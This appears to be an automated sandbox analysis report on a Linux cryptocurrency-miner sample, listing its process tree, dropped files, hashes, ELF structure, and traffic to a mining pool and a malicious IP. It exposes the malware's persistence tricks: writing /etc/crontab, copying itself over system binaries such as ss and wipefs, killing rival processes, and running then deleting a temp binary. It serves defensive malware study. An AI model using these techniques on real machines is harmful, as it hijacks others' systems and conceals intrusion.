tmpnam_KEKnmE New Fork (PID: 6266, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 6267, Parent: 6266)

grep (PID: 6267, Parent: 6266, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 6268, Parent: 6266)

uniq (PID: 6268, Parent: 6266, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 6269, Parent: 6266)

wc (PID: 6269, Parent: 6266, MD5: 1304115f965d6c9062947a3b35d9e140)

tmpnam_KEKnmE New Fork (PID: 6270, Parent: 5488)

tmpnam_KEKnmE New Fork (PID: 6271, Parent: 6270)

grep (PID: 6271, Parent: 6270, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

tmpnam_KEKnmE New Fork (PID: 6272, Parent: 6270)

uniq (PID: 6272, Parent: 6270, MD5: a83f5f379d810462d528dc460d63a04b)

tmpnam_KEKnmE New Fork (PID: 6273, Parent: 5488)

uname (PID: 6273, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)

tmpnam_KEKnmE New Fork (PID: 5473, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5480, Parent: 5473)

which (PID: 5480, Parent: 5473, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5489, Parent: 5465)

which (PID: 5489, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5499, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5509, Parent: 5499)

which (PID: 5509, Parent: 5499, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5522, Parent: 5465)

which (PID: 5522, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5530, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5541, Parent: 5530)

which (PID: 5541, Parent: 5530, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5550, Parent: 5465)

which (PID: 5550, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5559, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5568, Parent: 5559)

chattr (PID: 5568, Parent: 5559, MD5: 429aabf876ae1d2fa2459219366d273c)

tmpnam_KEKnmE New Fork (PID: 5585, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5595, Parent: 5585)

chmod (PID: 5595, Parent: 5585, MD5: 7c556d30bb69995e4844f5e319e8c303)

tmpnam_KEKnmE New Fork (PID: 5607, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5615, Parent: 5607)

cp (PID: 5615, Parent: 5607, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)

tmpnam_KEKnmE New Fork (PID: 5641, Parent: 5607)

touch (PID: 5641, Parent: 5607, MD5: 985a951b1a7a8dbe51973e651a365900)

tmpnam_KEKnmE New Fork (PID: 5649, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5658, Parent: 5649)

which (PID: 5658, Parent: 5649, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5666, Parent: 5465)

which (PID: 5666, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5675, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5678, Parent: 5675)

which (PID: 5678, Parent: 5675, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5688, Parent: 5465)

which (PID: 5688, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5693, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5703, Parent: 5693)

chattr (PID: 5703, Parent: 5693, MD5: 429aabf876ae1d2fa2459219366d273c)

tmpnam_KEKnmE New Fork (PID: 5712, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5721, Parent: 5712)

which (PID: 5721, Parent: 5712, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5729, Parent: 5465)

which (PID: 5729, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5747, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5755, Parent: 5747)

which (PID: 5755, Parent: 5747, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5763, Parent: 5465)

which (PID: 5763, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5772, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5780, Parent: 5772)

which (PID: 5780, Parent: 5772, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5789, Parent: 5465)

which (PID: 5789, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5797, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5805, Parent: 5797)

chattr (PID: 5805, Parent: 5797, MD5: 429aabf876ae1d2fa2459219366d273c)

tmpnam_KEKnmE New Fork (PID: 5818, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5827, Parent: 5818)

chmod (PID: 5827, Parent: 5818, MD5: 7c556d30bb69995e4844f5e319e8c303)

tmpnam_KEKnmE New Fork (PID: 5837, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5845, Parent: 5837)

cp (PID: 5845, Parent: 5837, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)

tmpnam_KEKnmE New Fork (PID: 5854, Parent: 5837)

touch (PID: 5854, Parent: 5837, MD5: 985a951b1a7a8dbe51973e651a365900)

tmpnam_KEKnmE New Fork (PID: 5862, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5870, Parent: 5862)

which (PID: 5870, Parent: 5862, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5877, Parent: 5465)

which (PID: 5877, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5884, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5891, Parent: 5884)

which (PID: 5891, Parent: 5884, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5898, Parent: 5465)

which (PID: 5898, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)

tmpnam_KEKnmE New Fork (PID: 5909, Parent: 5465)

tmpnam_KEKnmE New Fork (PID: 5918, Parent: 5909)

chattr (PID: 5918, Parent: 5909, MD5: 429aabf876ae1d2fa2459219366d273c)

sh New Fork (PID: 5925, Parent: 5461)

rm (PID: 5925, Parent: 5461, MD5: a53cece4b9a67959e2143873e47a9cc5)

coinminer New Fork (PID: 5455, Parent: 5451)

sh (PID: 5455, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 5458, Parent: 5455)

cp (PID: 5458, Parent: 5455, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)

sh New Fork (PID: 5471, Parent: 5455)

ln (PID: 5471, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5481, Parent: 5455)

ln (PID: 5481, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5490, Parent: 5455)

ln (PID: 5490, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5498, Parent: 5455)

ln (PID: 5498, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5507, Parent: 5455)

ln (PID: 5507, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5520, Parent: 5455)

ln (PID: 5520, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5529, Parent: 5455)

ln (PID: 5529, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5538, Parent: 5455)

ln (PID: 5538, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5546, Parent: 5455)

ln (PID: 5546, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5556, Parent: 5455)

ln (PID: 5556, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5565, Parent: 5455)

ln (PID: 5565, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5573, Parent: 5455)

ln (PID: 5573, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5581, Parent: 5455)

ln (PID: 5581, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5590, Parent: 5455)

ln (PID: 5590, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5599, Parent: 5455)

ln (PID: 5599, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)

sh New Fork (PID: 5609, Parent: 5455)

touch (PID: 5609, Parent: 5455, MD5: 985a951b1a7a8dbe51973e651a365900)

coinminer New Fork (PID: 5618, Parent: 5451)

sh (PID: 5618, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

cat (PID: 5618, Parent: 5451, MD5: 1484a27859e2ca20ad667cc06d595d22)

coinminer New Fork (PID: 5632, Parent: 5451)

sh (PID: 5632, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

coinminer New Fork (PID: 5640, Parent: 5451)

sh (PID: 5640, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 5651, Parent: 5640)

sysctl (PID: 5651, Parent: 5640, MD5: 9df6c33985f7fcbf67238428900a5a8d)

coinminer New Fork (PID: 5667, Parent: 5451)

sh (PID: 5667, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 5676, Parent: 5667)

sysctl (PID: 5676, Parent: 5667, MD5: 9df6c33985f7fcbf67238428900a5a8d)

coinminer New Fork (PID: 5694, Parent: 5451)

sh (PID: 5694, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 5702, Parent: 5694)

sh New Fork (PID: 5711, Parent: 5702)

touch (PID: 5711, Parent: 5702, MD5: 985a951b1a7a8dbe51973e651a365900)

sh New Fork (PID: 5724, Parent: 5702)

chmod (PID: 5724, Parent: 5702, MD5: 7c556d30bb69995e4844f5e319e8c303)

coinminer New Fork (PID: 5731, Parent: 5451)

coinminer New Fork (PID: 6121, Parent: 5731)

sh (PID: 6121, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 6122, Parent: 6121)

ps (PID: 6122, Parent: 6121, MD5: 8f71c85b9cc1809af7e7612c6144c527)

sh New Fork (PID: 6123, Parent: 6121)

grep (PID: 6123, Parent: 6121, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

sh New Fork (PID: 6124, Parent: 6121)

awk (PID: 6124, Parent: 6121, MD5: 36e491b1e47944fb397b84f790ef5093)

sh New Fork (PID: 6125, Parent: 6121)

xargs (PID: 6125, Parent: 6121, MD5: 2098c131c6f1f63777e9678b4be4e752)

xargs New Fork (PID: 6129, Parent: 6125)

kill (PID: 6129, Parent: 6125, MD5: 39b42e1d9f0e1f508f3d256386551133)

coinminer New Fork (PID: 6218, Parent: 5731)

sh (PID: 6218, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)

sh New Fork (PID: 6219, Parent: 6218)

ps (PID: 6219, Parent: 6218, MD5: 8f71c85b9cc1809af7e7612c6144c527)

sh New Fork (PID: 6220, Parent: 6218)

grep (PID: 6220, Parent: 6218, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)

sh New Fork (PID: 6221, Parent: 6218)

awk (PID: 6221, Parent: 6218, MD5: 36e491b1e47944fb397b84f790ef5093)

sh New Fork (PID: 6222, Parent: 6218)

xargs (PID: 6222, Parent: 6218, MD5: 2098c131c6f1f63777e9678b4be4e752)

xargs New Fork (PID: 6224, Parent: 6222)

kill (PID: 6224, Parent: 6222, MD5: 39b42e1d9f0e1f508f3d256386551133)

cleanup

Created / dropped Files

/etc/crontab
Process:	/bin/sh
File Type:	ASCII text
Size (bytes):	29
Entropy (8bit):	3.7454064259382482
Encrypted:	false
MD5:	5FD705938F9AC092F364F71EA2BD0E6F
SHA1:	F509AA606288B3971D2EB26A34CA1B5E367BDA83
SHA-256:	EC76426A62B45CC455F05FBCCE1C35DCDD4A6C51B07F912BDF975483C5C5592D
SHA-512:	12BF7782F11E8FB9F22558D5B0E406F1671DF5C61316CBABFAB24038450224D73F0037907A75265008EADF0EB159FB86A3A37497CACB41058A7B8A67FB16DF86
Malicious:	true
Reputation:	low

/etc/rc.d/init.d/acpidtd
Process:	/bin/cp
File Type:	ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):	1223753
Entropy (8bit):	7.078975512411001
Encrypted:	false
MD5:	EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:	2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:	723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:	158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:	true
Reputation:	low

/etc/resolv.conf
Process:	/tmp/coinminer
File Type:	ASCII text
Size (bytes):	53
Entropy (8bit):	3.752995276014951
Encrypted:	false
MD5:	3615D12B4DE9B6DFB843FAA13BA27EE3
SHA1:	097CB5451232E8249E7EB5425A9F1389290ECF0D
SHA-256:	63B88F240DBC259B3F4CEF56B8B65E5826284D9239660CB2858A7426831B4779
SHA-512:	8589AE151FC60CAD1FB187611BC81BF7A903B6647A491C0BFD5A54C394162231165D145C4D4833563FC3440ED7D95F57D9A230057ADCE4EF8BF0F7917A422026
Malicious:	false
Reputation:	low

/proc/sys/vm/nr_hugepages
Process:	/sbin/sysctl
File Type:	ASCII text
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
MD5:	650A1C9C9BAA20730B4FCFDBE4CDC135
SHA1:	3E3B509DB98E4D590F900354BA6D0D7FCA39FF2D
SHA-256:	56292515F7D3A7110811EB8DE26B3F75F82A0766AA5A1FD66EBCFCB84FE6D5FF
SHA-512:	45DA0A164742A0A7294B68A1A0FB1868B4DEA8E1D2B5519FAADBC768CDA1AF44246EAF3032B7629D4EB106D5524611637BA49202F6790438CD351CAED489A21E
Malicious:	false
Reputation:	low

/tmp/tmplog
Process:	/tmp/coinminer
File Type:	ASCII text
Size (bytes):	136
Entropy (8bit):	4.646588511354186
Encrypted:	false
MD5:	A1ED9B1A92D85563B426DC5C369C81DF
SHA1:	B2339DFA93BC2991E1DE7245D68A10AE8CBB6507
SHA-256:	DB90E116874B411C2DE00E2B703EFD02E7CFDAF309745551B440CAEEBCDD2083
SHA-512:	1839FFF5953AD74155AA9C4214279EFF8B8B6AB31D33E41A0EED6AF9BCB568AAE14DA77E11F9A95E76A22314DAA58471A1BB0345CF8E926DE6B69C4DBB28CA82
Malicious:	false
Reputation:	low

/tmp/tmpnam_KEKnmE
Process:	/tmp/coinminer
File Type:	ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):	1223753
Entropy (8bit):	7.078975512411001
Encrypted:	false
MD5:	EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:	2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:	723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:	158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:	true
Reputation:	low

/usr/bin/ddus-uidgen
Process:	/bin/cp
File Type:	ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):	1223753
Entropy (8bit):	7.078975512411001
Encrypted:	false
MD5:	EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:	2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:	723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:	158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:	false
Reputation:	low

/usr/bin/scnetstat
Process:	/tmp/tmpnam_KEKnmE
File Type:	data
Size (bytes):	123675
Entropy (8bit):	5.876757520501345
Encrypted:	false
MD5:	D03327A4CE834705219DFD33F391486B
SHA1:	E5635CB6D40541B6E67C7D11EC3D19F67BDC3CD0
SHA-256:	427EE62CC86673A3ABB1406CA80B1BE41EECDF795B0C2206793923AE68C9A3A6
SHA-512:	938A5A24C6451939D5272523518FFEE8C510B49A7EC4573450D1B02C088335363DA6C3D65376F8404B8214047A4F3F39476B3370374DC45466C61E7BA5B5EE35
Malicious:	false
Reputation:	low

/usr/bin/wipefs
Process:	/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Size (bytes):	2384177
Entropy (8bit):	7.385631032142223
Encrypted:	false
MD5:	9A0629BBB97EF2C2FD8369778AA9A0D3
SHA1:	AC522A00B0B668FEDCABB26D9F8A3F730A34DAFB
SHA-256:	D47D2AA3C640E1563BA294A140AB3CCD22F987D5C5794C223CA8557B68C25E0D
SHA-512:	175B0E11A995E545E2D7B351C67DE56F8B1BA4667811BE665DB2CBA4C27D4FD643F581564F07D413FCED4F497186DE94CA3E1BC68C9CB5D39FCF498140E19ABB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse
Reputation:	low

/usr/sbin/scss
Process:	/tmp/tmpnam_KEKnmE
File Type:	data
Size (bytes):	123675
Entropy (8bit):	5.934501190892608
Encrypted:	false
MD5:	CA5B7947D2A598F71E675EE80FC28280
SHA1:	44F3D6EC178920DC26B0BDF35FD5F5F3712B3463
SHA-256:	04E38230DAE3FF2444A14C01535FD31CC13488B7DD4E42386D8CA7F86E542D14
SHA-512:	5960ADE39D187594184965F3DC831E22E89E70E15A64977D848F1377F1CE7702E7B0C82EFA54760DD1F890EF8979D17DE0B4AA3B94FE92C307A789F224194393
Malicious:	false
Reputation:	low

/usr/sbin/ss
Process:	/bin/cp
File Type:	ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):	1223753
Entropy (8bit):	7.078975512411001
Encrypted:	false
MD5:	EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:	2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:	723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:	158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool.minexmr.com	37.59.43.131	true	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
37.59.43.131	France		16276	OVHFR	false
163.17.30.212	Taiwan; Republic of China (ROC)		1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	true

Static File Info

General
File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	7.385631032142223
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	coinminer
File size:	2384177
MD5:	9a0629bbb97ef2c2fd8369778aa9a0d3
SHA1:	ac522a00b0b668fedcabb26d9f8a3f730a34dafb
SHA256:	d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
SHA512:	175b0e11a995e545e2d7b351c67de56f8b1ba4667811be665db2cba4c27d4fd643f581564f07d413fced4f497186de94ca3e1bc68c9cb5d39fcf498140e19abb
File Content Preview:	.ELF..............>.......@.....@........\$.........@.8...@.......................@.......@.....<.#.....<.#....... ...............#......................y................ ...............#.............................................Q.td...................

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4015ff
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	5
Section Header Offset:	2383024
Section Header Size:	64
Number of Section Headers:	18
Header String Table Index:	17

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400158	0x158	0xd	0x0	0x6	AX	1
.text	PROGBITS	0x400170	0x170	0xcce12	0x0	0x6	AX	16
.fini	PROGBITS	0x4ccf82	0xccf82	0x8	0x0	0x6	AX	1
.rodata	PROGBITS	0x4ccfa0	0xccfa0	0x1479f0	0x0	0x2	A	32
.eh_frame	PROGBITS	0x614990	0x214990	0x26174	0x0	0x2	A	8
.gcc_except_table	PROGBITS	0x63ab04	0x23ab04	0x3438	0x0	0x2	A	4
.tbss	NOBITS	0x83e280	0x23e280	0x10	0x0	0x403	WAT	8
.init_array	INIT_ARRAY	0x83e280	0x23e280	0x38	0x0	0x3	WA	8
.ctors	PROGBITS	0x83e2b8	0x23e2b8	0x10	0x0	0x3	WA	8
.dtors	PROGBITS	0x83e2c8	0x23e2c8	0x10	0x0	0x3	WA	8
.jcr	PROGBITS	0x83e2d8	0x23e2d8	0x8	0x0	0x3	WA	8
.data.rel.ro	PROGBITS	0x83e2e0	0x23e2e0	0x6b90	0x0	0x3	WA	32
.got	PROGBITS	0x844e70	0x244e70	0x178	0x8	0x3	WA	8
.data	PROGBITS	0x845000	0x245000	0xc08	0x0	0x3	WA	32
.bss	NOBITS	0x845c20	0x245c08	0x4268	0x0	0x3	WA	32
.comment	PROGBITS	0x0	0x245c08	0x1a	0x1	0x30	MS	1
.shstrtab	STRTAB	0x0	0x245c22	0x8c	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x23df3c	0x23df3c	0x5	R E	0x200000	.init .text .fini .rodata .eh_frame .gcc_except_table
LOAD	0x23e280	0x83e280	0x83e280	0x7988	0xbc08	0x6	RW	0x200000	.init_array .ctors .dtors .jcr .data.rel.ro .got .data .bss
<unknown>	0x23e280	0x83e280	0x83e280	0x0	0x10	0x4	R	0x8
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0x6	RW	0x10
GNU_RELRO	0x23e280	0x83e280	0x83e280	0x6d80	0x6d80	0x4	R	0x1	.init_array .ctors .dtors .jcr .data.rel.ro .got

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2018 15:20:09.070719957 CEST	41178	53	192.168.1.101	208.67.222.222
May 31, 2018 15:20:09.070868969 CEST	41178	53	192.168.1.101	114.114.114.114
May 31, 2018 15:20:09.162802935 CEST	39526	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:20:09.162842989 CEST	8525	39526	163.17.30.212	192.168.1.101
May 31, 2018 15:20:09.162961960 CEST	39526	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:20:09.226970911 CEST	39526	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:20:09.227022886 CEST	8525	39526	163.17.30.212	192.168.1.101
May 31, 2018 15:20:09.234932899 CEST	53	41178	114.114.114.114	192.168.1.101
May 31, 2018 15:20:09.235042095 CEST	53	41178	208.67.222.222	192.168.1.101
May 31, 2018 15:20:09.235799074 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:20:09.235841036 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:20:09.236087084 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:20:09.236382961 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:20:09.236401081 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:20:09.577944040 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:20:09.578080893 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:20:59.584933043 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:20:59.585001945 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:21:09.307377100 CEST	39526	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:21:09.307564020 CEST	8525	39526	163.17.30.212	192.168.1.101
May 31, 2018 15:21:09.307681084 CEST	39526	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:21:10.375436068 CEST	39530	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:21:10.375507116 CEST	8525	39530	163.17.30.212	192.168.1.101
May 31, 2018 15:21:10.375675917 CEST	39530	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:21:10.390609980 CEST	39530	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:21:10.390674114 CEST	8525	39530	163.17.30.212	192.168.1.101
May 31, 2018 15:21:39.675071955 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:21:39.675107956 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:21:39.820540905 CEST	4444	55686	37.59.43.131	192.168.1.101
May 31, 2018 15:21:39.820723057 CEST	55686	4444	192.168.1.101	37.59.43.131
May 31, 2018 15:22:10.451134920 CEST	39530	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:22:10.451292038 CEST	8525	39530	163.17.30.212	192.168.1.101
May 31, 2018 15:22:10.451447010 CEST	39530	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:22:11.455296040 CEST	39532	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:22:11.455348015 CEST	8525	39532	163.17.30.212	192.168.1.101
May 31, 2018 15:22:11.455499887 CEST	39532	8525	192.168.1.101	163.17.30.212
May 31, 2018 15:22:11.628572941 CEST	39532	8525	192.168.1.101	163.17.30.212

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2018 15:20:09.070719957 CEST	41178	53	192.168.1.101	208.67.222.222
May 31, 2018 15:20:09.070868969 CEST	41178	53	192.168.1.101	114.114.114.114
May 31, 2018 15:20:09.234932899 CEST	53	41178	114.114.114.114	192.168.1.101
May 31, 2018 15:20:09.235042095 CEST	53	41178	208.67.222.222	192.168.1.101

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 31, 2018 15:20:09.070719957 CEST	192.168.1.101	208.67.222.222	0x8faa	Standard query (0)	pool.minexmr.com	A (IP address)	IN (0x0001)
May 31, 2018 15:20:09.070868969 CEST	192.168.1.101	114.114.114.114	0x8faa	Standard query (0)	pool.minexmr.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
May 31, 2018 15:20:09.234932899 CEST	114.114.114.114	192.168.1.101	0x8faa	No error (0)	pool.minexmr.com		37.59.43.131	A (IP address)	IN (0x0001)
May 31, 2018 15:20:09.235042095 CEST	208.67.222.222	192.168.1.101	0x8faa	No error (0)	pool.minexmr.com		37.59.43.131	A (IP address)	IN (0x0001)

System Behavior

Analysis Process: coinminer PID: 5451 Parent PID: 5410

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	/tmp/coinminer
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: coinminer PID: 5454 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: coinminer PID: 5461 Parent PID: 5454

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5461 Parent PID: 5454

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "/tmp/tmpnam_KEKnmE upgrade >/dev/null 2>&1; rm /tmp/tmpnam_KEKnmE >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5465 Parent PID: 5461

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5465 Parent PID: 5461

General

Start time:	15:20:07
